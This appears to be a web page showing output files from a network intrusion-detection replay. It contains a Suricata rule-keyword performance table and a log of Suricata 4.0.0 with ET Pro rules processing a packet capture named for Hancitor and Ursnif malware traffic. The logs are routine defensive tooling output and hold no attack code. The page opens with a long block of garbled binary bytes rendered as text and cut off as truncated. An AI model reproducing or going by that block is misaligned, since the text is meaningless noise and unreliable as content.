!©¤ÁgKß]¦hyNôM¼Û¬T´nö]þ'½×vv܊˜Ü×Ïè·Ë€Ý‹Õ+Û´Ò³4$ÅªEßïïp›¤X¬t˜¸¿×‹»øV!Öh•¹ÝOÀx¡”)£?¡ª‚ÝaDqZm²†T?£xC*t´¦@¢8:Ýõȵ³@”g{ö¡
ÅLX£­èn¨`´Ä• µõLUÛÑ×('ÛOՋ+€+Ö ´˜¦ÕEOð…-µ•Ï„__ÞÍL…A%@•Ôò€ÜbI‡¯|3vP³àD¨'8L¤ƒÕE_^5ۇA„ÞJ¥0¼ ¢–iéÕ!*€Ü«8!û€@ÍDOÕHðžI1 ;â¹>I…*ڑA(„-z°­üÝÄHKhÄî'i›‰J 8%$h-º@¨}TÑ@J°­1¼VW->«•!³–OЌí¼l·xÕ°aµ£È¸J?àõ*7Ö
Ú«ÐâU ÅüÍt)Õô‡¨õSÄhS󠚯Ál ‹§Kßõ¥XH¨£ã¼:‹˜L	‚È\t'·QjLïTy¿[™ž@­§)^4=ú‚¶ýv5ɽgÇBM*2_¨Ò6Hå+ÊÕ̀K¡¸wrö.´Nå4Îh]…U·æèóP…«¹{M-7UëÕ£Q£sÑ,Bøubµóz·Ñh)7D!ÕÀX@¬ý(&œHÖVPUTa¡hJáïUT{Ü8sˆ@U'cßh…tãT[Å/J„ÀK=Î*W‹÷:Ëø^©„I´àªUÖ±5Q˝=®€
…VŒó-ہé¼Ò%V¢ö›eÀŒÐ¯N3Om@ŠµÃóD+‚ë/”ä(éÆ&à>°º|˜«}º»ØÀLÀ«œ<U=Òª@à£ûؤðvhˆk="<`¨[Š+xwñ¥–iZÛ(Vô±JL›f8H@ÑíËrÀ„²7OÀœ’‡è–)GÔ]D öšNØzhÙpìŠÐáJB¤˜´ðØj ©«n!zJxú·‡(J¡ÙPÕ Ò¨KÅzJ”úH‡(jÒ¨N\?n¿\?n¿mI2E$ÖÄ2W’S
ePÀP&1KýzJ¬ýGT{‡(~Ò¨-Ké}€èGT‡(Ò¨YÕx€üGT‡(Õú4ÕL€ÀGT'€zJðú ÕP€Ô@KUzJúÜÕ¤Ò¨…KAzJúȇ(êÒ¨±K}zJ,ýGTû‡(þÒ¨­Ki}€hGT‡(‚Ò¨ÙÕø€|GT“‡(–Õú´ÕÌ€@GT§@zJtú¨Õ(hQ¾¿\Õ$€¸GT_‡(à˜úHÕ

This file has been truncated. Go here to download in full.


keyword_perf.log - (14931 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 1/31/2019 -- 11:12:00
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             17793329        5601            5601            57345           3176.00         3176.00         0.00           
  content          102283449       19053           12828           17049374        5368.00         4281.00         7609.00        
  pcre             17688207        4953            836             384688          3571.00         4312.00         3420.00        
  byte_test        25191043        8907            6316            71749           2828.00         2846.00         2784.00        
  isdataat         2570046         921             0               21804           2790.00         0.00            2790.00        
  flowbits         2041046         715             59              27593           2854.00         3785.00         2770.00        
  urilen           3849779         1179            324             96066           3265.00         3224.00         3280.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             17793329        5601            5601            57345           3176.00         3176.00         0.00           
  flowbits         1934792         694             38              15083           2787.00         3081.00         2770.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          35298962        11058           7715            440031          3192.00         3118.00         3362.00        
  pcre             4663872         1333            302             53580           3498.00         3472.00         3506.00        
  byte_test        25191043        8907            6316            71749           2828.00         2846.00         2784.00        
  isdataat         2567241         920             0               21804           2790.00         0.00            2790.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         106254          21              21              27593           5059.00         5059.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5104375         1339            876             44436           3812.00         3837.00         3764.00        
  pcre             3167986         690             212             72613           4591.00         4886.00         4460.00        
  isdataat         2805            1               0               2805            2805.00         0.00            2805.00        
  urilen           3849779         1179            324             96066           3265.00         3224.00         3280.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1577161         431             125             18422           3659.00         3445.00         3746.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          142522          41              0               18268           3476.00         0.00            3476.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          39924014        920             317             17049374        43395.00        38958.00        45728.00       
  pcre             7024934         2326            0               384688          3020.00         0.00            3020.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          14286311        3678            2684            31817           3884.00         3921.00         3783.00        
  pcre             2095684         438             190             21834           4784.00         5091.00         4549.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1617099         454             301             20979           3561.00         3518.00         3648.00        
  pcre             107983          27              22              12706           3999.00         3514.00         6130.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          26245           9               0               3174            2916.00         0.00            2916.00        
  pcre             122146          25              0               16836           4885.00         0.00            4885.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          446654          127             125             17518           3516.00         3510.00         3934.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_protocol
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          14594           4               4               3937            3648.00         3648.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2081859         526             456             87435           3957.00         3820.00         4853.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1366987         348             197             86495           3928.00         4217.00         3551.00        
  pcre             475706          110             110             17164           4324.00         4324.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          21478           5               5               4728            4295.00         4295.00         0.00           
  pcre             29896           4               0               16667           7474.00         0.00            7474.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          352173          108             18              4759            3260.00         3426.00         3227.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: dns_query
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          23015           5               5               5104            4603.00         4603.00         0.00           


IDSDeathBlossom.py.log - (1189 bytes) - download
1
2
3
4
5
6
7
8
2019-01-31 11:11:38,490 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-01-31 11:11:39,192 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-01-31 11:11:39,193 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-01-31 11:11:39,193 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-01-31 11:11:39,193 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-01-31 11:11:39,193 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/2280b037326fec8a762c9a1b32aae0ca56b33745cb75ec8c950e11a498e082d2 -r /var/pcap/01312019.1111-2019-01-16-Hancitor-infection-traffic-with-Ursnif.pcap -vvv -k none
2019-01-31 11:12:00,259 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-01-31 11:12:00,260 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 21.7817521095